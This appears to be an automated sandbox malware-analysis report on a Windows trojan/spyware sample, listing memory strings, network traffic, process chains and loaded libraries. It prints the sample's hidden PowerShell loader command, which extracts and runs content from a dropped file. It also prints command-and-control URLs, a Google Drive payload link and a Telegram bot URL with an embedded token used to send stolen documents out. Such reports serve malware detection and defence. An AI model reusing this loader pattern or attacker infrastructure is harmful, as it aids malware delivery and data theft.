Source: msiexec.exe, 00000006.00000002.2915272738.0000000022B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022B9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: msiexec.exe, 00000006.00000002.2923603784.0000000024CEB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865733704.0000000024CEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: msiexec.exe, 00000006.00000003.2865375578.0000000024D0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2923603784.0000000024CEB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2923538381.0000000024C90000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865733704.0000000024CEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000001.00000002.2324205397.0000000000404000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.2329786451.0000000006F03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microv
Source: msiexec.exe, 00000006.00000002.2923603784.0000000024CEB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865760491.0000000024D08000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865733704.0000000024CEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022B3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.ndovumotor.com
Source: 000027_A-000032.exe, 000027_A-000032.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 000027_A-000032.exe, 000027_A-000032.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2327496377.0000000005737000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: msiexec.exe, 00000006.00000002.2923603784.0000000024CEB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865733704.0000000024CEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: msiexec.exe, 00000006.00000002.2923603784.0000000024CEB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865760491.0000000024D08000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865733704.0000000024CEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0-
Source: powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2325213395.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.2325213395.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7855907741:AAE8geAKHsbOjUTKKIp5xQcpPo7PZ41e12I/sendDocument?chat_id=5039
Source: msiexec.exe, 00000006.00000003.2360570782.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: powershell.exe, 00000001.00000002.2327496377.0000000005737000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2327496377.0000000005737000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2327496377.0000000005737000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.2902791239.0000000006F6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.2902791239.0000000006F6A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2902764098.0000000006F10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gMrUkPglcluqU0V9ndhQKIrnUj84qLTS
Source: msiexec.exe, 00000006.00000003.2396192756.0000000006FD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2902791239.0000000006FC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.2396192756.0000000006FD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2902791239.0000000006FC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/6
Source: msiexec.exe, 00000006.00000003.2360570782.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2396192756.0000000006FD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2902791239.0000000006FC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gMrUkPglcluqU0V9ndhQKIrnUj84qLTS&export=download
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000001.00000002.2325213395.0000000004826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2327496377.0000000005737000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.2915272738.00000000229EB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.2915272738.00000000229EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022A16000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022A84000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000006.00000002.2923603784.0000000024CEB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865760491.0000000024D08000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022B31000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2865733704.0000000024CEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: msiexec.exe, 00000006.00000003.2360570782.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023A75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C19000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023AC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023AEA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023D1C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023AC5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023CF7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023A7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C1F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023A50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023A75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C19000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023AC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023AEA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023D1C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023AC5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023CF7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023A7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023C1F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2918802703.0000000023A50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000006.00000003.2360570782.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2360570782.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000006.00000003.2360570782.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2360570782.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49983 version: TLS 1.2

Source: C:\Users\user\Desktop\000027_A-000032.exe

Code function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004051BA

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Igaar\000027_A-000032.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\000027_A-000032.exe

Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040322B

Source: C:\Users\user\Desktop\000027_A-000032.exe	Code function: 0_2_004049F9	0_2_004049F9
Source: C:\Users\user\Desktop\000027_A-000032.exe	Code function: 0_2_004064AE	0_2_004064AE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BFC147	6_2_00BFC147
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BFD278	6_2_00BFD278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BF5330	6_2_00BF5330
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BFC468	6_2_00BFC468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BFC738	6_2_00BFC738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BFE988	6_2_00BFE988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BFCA08	6_2_00BFCA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BFCCD8	6_2_00BFCCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BF3E09	6_2_00BF3E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BFCFAB	6_2_00BFCFAB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BF7118	6_2_00BF7118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BFE97B	6_2_00BFE97B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BFF961	6_2_00BFF961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00BF9DE0	6_2_00BF9DE0

Source: 000027_A-000032.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/26@6/6

Source: C:\Users\user\Desktop\000027_A-000032.exe

0_2_0040322B

Source: C:\Users\user\Desktop\000027_A-000032.exe

Code function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404486

Source: C:\Users\user\Desktop\000027_A-000032.exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\000027_A-000032.exe

File created: C:\Users\user\AppData\Roaming\toytown

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03

Source: C:\Users\user\Desktop\000027_A-000032.exe

File created: C:\Users\user\AppData\Local\Temp\nsgE3F8.tmp

Jump to behavior

Source: 000027_A-000032.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\000027_A-000032.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\000027_A-000032.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 000027_A-000032.exe	Virustotal: Detection: 40%
Source: 000027_A-000032.exe	ReversingLabs: Detection: 45%

Source: C:\Users\user\Desktop\000027_A-000032.exe

File read: C:\Users\user\Desktop\000027_A-000032.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\000027_A-000032.exe "C:\Users\user\Desktop\000027_A-000032.exe"
Source: C:\Users\user\Desktop\000027_A-000032.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Peptidases=Get-Content -Raw 'C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Jazzmusikers.Cam';$Inkorporerer=$Peptidases.SubString(55039,3);.$Inkorporerer($Peptidases)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\000027_A-000032.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Peptidases=Get-Content -Raw 'C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Jazzmusikers.Cam';$Inkorporerer=$Peptidases.SubString(55039,3);.$Inkorporerer($Peptidases)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\000027_A-000032.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
